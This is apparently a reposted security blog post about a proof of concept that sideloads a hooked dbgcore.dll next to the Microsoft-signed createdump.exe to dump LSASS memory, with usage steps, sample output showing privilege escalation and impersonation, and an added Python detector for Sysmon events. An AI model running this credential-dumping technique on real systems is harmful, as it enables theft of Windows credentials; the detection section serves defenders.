Using the WindowsApp createdump tool to obtain an LSASS dump

admin, 23 September 2024 14:30:26, 12 views, 1598 characters, 5 min 19 s read

This project demonstrates how createdump.exe, a Microsoft-signed executable shipped inside a Windows app package, can be used to dump the LSASS process: a custom hook is loaded alongside it to redirect the process access it performs toward LSASS.

Get-AuthenticodeSignature -FilePath (Join-Path -Path (Get-AppxPackage -Name *Windows365*).InstallLocation -ChildPath 'wnc\createdump.exe')

    Directory: C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc

SignerCertificate Status StatusMessage Path
----------------- ------ ------------- ----
C2048FB509F1C37A8C3E9EC6648118458AA01780 Valid Signature verified. createdump.exe

How to use

  1. Copy createdump from the WindowsApps folder to a folder of your choice (copy "C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc\createdump.exe" .)

  2. Place the dbgcore.dll from this repo in the same folder

  3. Run createdump (optionally with arguments)

Note: administrator privileges are required.

The output should look like this:

c:\work_createdump>createdump.exe
WindowsApp PoC by Remko Weijnen
(ab)uses createdump tool from "The WindowsApp" to create an LSASS dump

Successfully hooked OpenProcess
OpenProcess called
Attempting to enable SeDebugPrivilege...
SeDebugPrivilege successfully enabled!
Attempting to impersonate winlogon...
Successfully impersonated winlogon
[createdump] Writing minidump with heap for process 35828 to file C:\Users\me\AppData\Local\Temp\dump.35828.dmp
MiniDumpWriteDump called with:
  ProcessId: 35828
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41a25
ProcessId changed to LSASS (PID: 1512)
Loaded DbgHelp.dll from: C:\Windows\System32\DbgCore.dll
Calling original with:
  ProcessId: 1512
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41026
MiniDumpWriteDump result: Success
[createdump] Dump successfully written in 270ms
DLL unloading, hooks removed.
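For defenders, the output above exposes three observable steps of this technique: the signed createdump.exe running from a folder outside its WindowsApps package, dbgcore.dll being resolved from the working folder instead of System32, and a handle being opened to lsass.exe. The following detection helper is an added example written for this post, not code from the original article or the createdump project; it assumes Sysmon-style JSON events (EventID 1, 7 and 10 with Sysmon's field names), and the sample events are constructed.

```python
"""Flag the sideloaded-createdump LSASS dump pattern in Sysmon-style events.
Added defender example, not code from the original post or the createdump
repo; field names follow Sysmon (EventID 1/7/10), sample events are constructed."""
import json

WINDOWSAPPS = "c:\\program files\\windowsapps\\"
SYSTEM32 = "c:\\windows\\system32\\"

def _p(value):  # normalise a path field for case-insensitive comparison
    return (value or "").lower()

def check_event(ev):
    """Return a finding for one event dict, or None if nothing is suspicious."""
    eid = ev.get("EventID")
    if eid == 1:  # ProcessCreate: the signed binary copied out of its package
        image = _p(ev.get("Image"))
        if image.endswith("createdump.exe") and not image.startswith(WINDOWSAPPS):
            return "createdump.exe executed outside WindowsApps: " + ev["Image"]
    elif eid == 7:  # ImageLoad: dbgcore.dll resolved from the working folder
        image, loaded = _p(ev.get("Image")), _p(ev.get("ImageLoaded"))
        if (image.endswith("createdump.exe") and loaded.endswith("dbgcore.dll")
                and not loaded.startswith(SYSTEM32)):
            return "createdump.exe loaded dbgcore.dll outside System32: " + ev["ImageLoaded"]
    elif eid == 10:  # ProcessAccess: the hooked dump opens LSASS
        src, tgt = _p(ev.get("SourceImage")), _p(ev.get("TargetImage"))
        if src.endswith("createdump.exe") and tgt.endswith("\\lsass.exe"):
            return "createdump.exe opened lsass.exe (PID %s)" % ev.get("TargetProcessId")
    return None

def scan(lines):
    """Run check_event over newline-delimited JSON events; return the findings."""
    findings = []
    for line in lines:
        if line.strip():
            finding = check_event(json.loads(line))
            if finding:
                findings.append(finding)
    return findings

# Constructed sample: one benign System32 load plus the three indicators.
SAMPLE_EVENTS = [
    '{"EventID": 1, "Image": "C:\\\\work_createdump\\\\createdump.exe"}',
    '{"EventID": 7, "Image": "C:\\\\work_createdump\\\\createdump.exe", "ImageLoaded": "C:\\\\work_createdump\\\\dbgcore.dll"}',
    '{"EventID": 7, "Image": "C:\\\\work_createdump\\\\createdump.exe", "ImageLoaded": "C:\\\\Windows\\\\System32\\\\DbgCore.dll"}',
    '{"EventID": 10, "SourceImage": "C:\\\\work_createdump\\\\createdump.exe", "TargetImage": "C:\\\\Windows\\\\system32\\\\lsass.exe", "TargetProcessId": 1512}',
]
```

Each of the three checks is independently useful; the ProcessAccess one also fires for any other copy of the binary that reaches LSASS, while the WindowsApps path check catches the copy step before a dump is attempted.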

Project URL:

https://github.com/rweijnen/createdump

Originally published by the WeChat public account Ots安全: Using the WindowsApp createdump tool to obtain an LSASS dump

When reposting, keep the link to this article (CN-SEC, with thanks to the original author): http://cn-sec.com/archives/3197390.html